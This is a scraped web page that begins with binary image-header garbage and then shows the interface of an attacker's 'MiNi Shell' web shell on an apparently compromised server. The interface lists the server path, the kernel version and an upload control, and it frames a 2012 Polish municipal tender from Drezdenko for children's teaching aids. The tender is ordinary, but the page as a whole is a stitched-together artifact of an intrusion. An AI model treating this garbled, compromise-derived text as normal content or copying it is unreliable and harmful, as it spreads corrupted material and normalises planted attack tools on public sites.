JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121204/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121204/255923-N-2012.html

<p class="kh_header"><b>Drezdenko: Dostawa pomocy dydaktycznych w ramach projektu Indywidualizacja procesu nauczania i wychowania uczniów klas I-III szkół podstawowych w Gminie Drezdenko</b><br>
<b>Numer ogłoszenia: 255923 - 2012; data zamieszczenia: 04.12.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski , ul. Warszawska 1, 66-530 Drezdenko, woj. lubuskie, tel. 095 7638027; 7620202, faks 095 7620220.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa pomocy dydaktycznych w ramach projektu Indywidualizacja procesu nauczania i wychowania uczniów klas I-III szkół podstawowych w Gminie Drezdenko.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa pomocy dydaktycznych dla uczniów klas I - III szkół podstawowych, prowadzonych przez Gminę Drezdenko, w ramach projektu Indywidualizacja procesu nauczania i wychowania uczniów klas I - III szkół podstawowych, współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego - Programu Operacyjnego Kapitał Ludzki, Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych. Przewidziano do realizacji 6 części dostaw.
Zamawiający dopuszcza składanie ofert częściowych. Wykonawcy mogą składać ofertę na dostawę wszystkich lub dowolnie wybranych części zamówienia. Zamawiający podzielił zamówienie na 6 części w następujący sposób:

Część 1  - Pomoce dydaktyczne do zajęć logopedycznych  dla dzieci z zaburzeniami rozwoju mowy
1.	Zagadki i wierszyki logopedyczne L i R -  wierszyki logopedyczne wraz z ćwiczeniami, przeznaczone do utrwalania i automatyzacji wymowy głosek L i R. Wiersze dają możliwość ćwiczenia głoski - 10 szt. (lub równoważne)
2.	Rymy szereg syczący-  zeszyt ćwiczeń logopedycznych  przeznaczony jest dla dzieci z wadliwą artykulacją głosek syczących, jak również dla tych, które dokonują zamiany syczących głosek - 10 szt, (lub równoważne)

3.	Rymy szereg szumiący- zeszyt ćwiczeń logopedycznych przeznaczony jest dla dzieci u których zdiagnozowano seplenienie głosek. Obejmuje on ćwiczenia szeregu szumiącego - 10 szt, (lub równoważne)

4.	Rymy szereg ciszący- zeszyt ćwiczeń logopedycznych przeznaczony jest do utrwalania alokacji głosek ciszących- 10 szt (lub równoważne)

5.	Wieża logopedyczna głoski- składa się z 60 kartonowych wież na każdej znajduje się 5 wyrazów do ćwiczeń, każdy kartonik jest oznaczony kolorowym symbolem - 10 szt (lub równoważne)

6.	Gra edukacyjna z rymowankami- zawierająca 72 kartoniki z obrazkami ukazujących rymy wśród obrazków - 10 szt. (lub równoważne)

Część 2  - Pomoce dydaktyczne do zajęć  rozwijających  zainteresowania uczniów uzdolnionych językowo (j. angielski)
1.	Alfabet po angielsku - plansza edukacyjna zawierająca literki i kolory po angielsku. Dzięki takiej zabawie dzieci mogą samodzielnie  poznawać nazwy - 2 szt (lub równoważne)

2.	Zestaw czasowników i rzeczowników - zestaw zawiera 60 kartonikowych elementów ( 30 kartoników z elementami warzyw + 30 kartoników z nazwą)  można ułożyć z nich 30 puzzli  - 1 szt (lub równoważne)

3.	Zestaw czasowników i rzeczowników - zestaw zawiera 60 kartonikowych elementów ( 30 kartoników z elementami liczb i kształtów + 30 kartoników z nazwą)  można ułożyć z nich 30 puzzli - 1 szt (lub równoważne)

4.	Zestaw czasowników i rzeczowników - zestaw zawiera 60 kartonikowych elementów (30 kartoników z elementami zwierząt + 30 kartoników z nazwą)  można ułożyć z nich 30 puzzli - 1 szt (lub równoważne)

5.	Angielski w zagadkach - zestaw składający się z 112 zagadek, które uczą języka przez zabawę, rozwijają spostrzegawczość i pamięć wzrokową - 2 szt (lub równoważne)

Część 3  - Pomoce dydaktyczne do zajęć  rozwijających zainteresowania uczniów uzdolnionych językowo (j. niemiecki)
1.	Zestaw niemieckie czasowniki + rzeczowniki (zestaw zawiera kartoniki z ilustracjami przedmiotów, zwierząt i pożywienia, które należy przyporządkować odpowiadającym podpisom w języku niemieckim,  kolorowy  paskowi samokontroli pomagający dzieciom  pracować z pomocą i samodzielnie)  - 9 szt. (lub równoważne)
2.	Tworzenie wyrazów - grupowy zestaw  (zestaw zawiera podstawowe pomoce potrzebne do nauki tworzenia wyrazów oraz ćwiczenia wymowy grup spółgłoskowych i dwuznaków, zawartość: duży zestaw klocków - tworzenie wyrazów,  4 zestawy kart aktywności Tworzenie wyrazów, 4 podstawki do kart i klocków) - 9 szt. (lub równoważne)
3.	Niemieckie bingo obrazkowe (obrazkowa wersja bingo dla dzieci - rzeczowniki z trzech grup tematycznych: owoce, warzywa i zwierzęta, zawartość: 28 kartoników) - 9 szt. (lub równoważne)
4.	Brogy - zestaw  1 (zestaw obejmuję tematykę: rodzina, zwierzęta gospodarskie, dzikie zwierzęta, ptaki, owoce, środki transportu, transport drogowy, zawartość: 210 kart podzielonych na 7 grup tematycznych,  karty ponumerowane na rewersie, 7 tubek przechowywania kart, całość umieszczona w trwałym pudełku) - 9 szt. (lub równoważne)
5.	Książka z piosenkami + CD (książka w twardej oprawie - teksty piosenek wraz z tłumaczeniami i zapisem nutowym melodii, płyta CD - 15 piosenek) - 2 szt.
Część 4 - Pomoce  dydaktyczne do zajęć  dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych
1.	Sposoby liczenia dodawanie i odejmowanie do 20 - seria składa się z dwóch książek , zawierająca karty z cyframi i znakami pozwalająca na indywidualną pracę dziecka jak i pracę w grupach można tak zorganizować, aby dziecko wspólnie z rówieśnikami poszukiwało rozwiązań. Potem mogą je kolejno podawać oraz wzajemnie się odpytywać - 12 szt. ( lub równoważne)

2.	Poznajemy godziny - gra edukacyjna  zawierająca plansze , 2 tarcze zegarowe, 30 kart czasu , kostkę do gry, pionki - 12szt  ( lub równoważne)

3.	Tabliczka mnożenia- gra edukacyjna zawierająca 96 kart do nauki tabliczki mnożenia. Dziecko odnajduje pary, czyli po dwie karty, które złożone razem tworzą działanie matematyczne (mnożenie)  - 12 szt  ( lub równoważne)

4.	Cyfry i liczby - układanka dydaktyczna zapoznająca dziecko z cyframi , znakami i podstawowymi działaniami matematycznymi składająca się z 40 drewnianych klocków - 12 szt (lub równoważne)

Część 5 - pomoce  dydaktyczne do zajęć  dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji
1.	Poznajemy literki- gra edukacyjna składając się z 96 liter, 35 obrazków przedstawiających przedmioty oraz 30 żetonów - 12 szt. ( lub równoważne)

2.	Literowanie- gra edukacyjna składająca się z 25  kostek z literkami z dziurką , 3 sztuki sznurka aby literki mogły być na niego nakładane i tworzyły wyraz - 12 szt. (lub równoważne)

3.	Samogłoski i spółgłoski- 36 tabliczek z samogłoskami, 70 tabliczek ze spółgłoskami - 12 szt. ( lub równoważne)

4.	Elementarz - książka  która zawiera tekst do czytania metodą sylabową - 40 szt. (lub równoważne)

5.	Bajki ortograficzne - podręcznik edukacyjny łączący ortografię z opowiadaniami dla dzieci - 10 szt. (lub równoważne)

Część 6 - pomoce dydaktyczne do zajęć  socjoterapeutycznych  i psychoedukacyjnych
1.	Książka edukacyjna ilustrująca uczucia dzieci mających trudności z wyrażaniem emocji - 2 szt (lub równoważne)

2.	Książka edukacyjna pokazująca zachowania dzieci dręczonych przez otoczenie , zastraszanych przez rówieśników itp. , która pokazuje jak z dana sytuacją sobie poradzić , jak być bezpiecznym - 2 szt ( lub równoważne)

3.	Podręcznik edukacyjny zawierający 150 przykładów gier i zabaw rozwijających dla dzieci trudnych - 2 szt. (lub równoważne)

4.	Bajki -  książka zawierająca bajki o uczuciach, o świadomy powiedzeniu TAK i  NIE , o problemach z którymi borykają się dzieci, bajki kończą się ciekawymi rozwiązaniami i puentą - 2 szt. ( lub równoważne)

5.	Układanka twarze - drewniana zabawka w postaci układanki pokazuje różne stany emocjonalne. Doskonała zabawka edukacyjna dla dzieci - 2 szt ( lub równoważne)

6.	Książka edukacyjna pokazująca dobre i złe zachowanie, zawierająca historyjki ukazujące dobre i złe zachowanie - 2 szt  ( lub równoważne)

Ewentualne, użyte nazwy własne należy rozumieć jako takie lub równoważne.
Zamawiający dopuszcza możliwość przedstawienia w ofercie towaru równoważnego pod warunkiem, iż oferowany towar będzie o takich samych lub lepszych parametrach technicznych, jakościowych, funkcjonalnych oraz użytkowych. W takim przypadku, Wykonawca zobowiązany jest przedstawić wraz z ofertą jego szczegółową specyfikację, z której w sposób nie budzący żadnej wątpliwości Zamawiającego winno wynikać, iż zaoferowany towar jest o takich samych lub lepszych parametrach technicznych, jakościowych, funkcjonalnych oraz użytkowych w odniesieniu do towaru określonego przez Zamawiającego w opisie przedmiotu zamówienia. 
Zamawiający informuje, iż wskazanie nazw zwyczajowych czy producentów w zamieszczonych opisach przedmiotu zamówienia służy wyłącznie określeniu cech technicznych i jakościowych oraz wynika z konieczności wykorzystania danego środka dydaktycznego dla osiągnięcia zamierzonych celów Projektu oraz osiągnięcia efektów dydaktyczno-wychowawczych.
Wszystkie materiały muszą być fabrycznie nowe, tzn. że żadna część składająca się na dany materiał nie może być używana , oraz wszystkie urządzenia i sprzęt muszą posiadać certyfikaty i atesty dopuszczające do użytku w szkole. Wykonawca dostarczy materiały dydaktyczne na własny koszt do Miejsko-Gminnego Zespołu Oświaty w Drezdenku  w dniach pracy poniedziałek-piątek w godz. 8.00 - 14.00..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 22.11.00.00-4, 37.52.41.00-8, 39.16.21.00-6, 39.16.21.10-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 7.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku, ocena na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu metodą spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku, ocena na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu metodą spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku, ocena na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu metodą spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku, ocena na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu metodą spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku, ocena na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu metodą spełnia / nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W przypadku, gdy Wykonawcę reprezentuje pełnomocnik, do oferty musi być załączone pełnomocnictwo (w oryginale lub kopii potwierdzonej notarialnie) z określeniem jego zakresu.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.drezdenko.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Drezdenku ul. Warszawska 1, 66-530 Drezdenko.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.12.2012 godzina 09:00, miejsce: Urząd Miejski w Drezdenku ul. Warszawska 1, 66-530 Drezdenko (Punkt Obsługi Klienta - parter).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 3.1. Projekt współfinansowany przez  Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Priorytetu IX. Rozwój wykształcenia i kompetencji w regionach, 
9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, 9.1.2. Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych Programu Operacyjnego Kapitał Ludzki..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com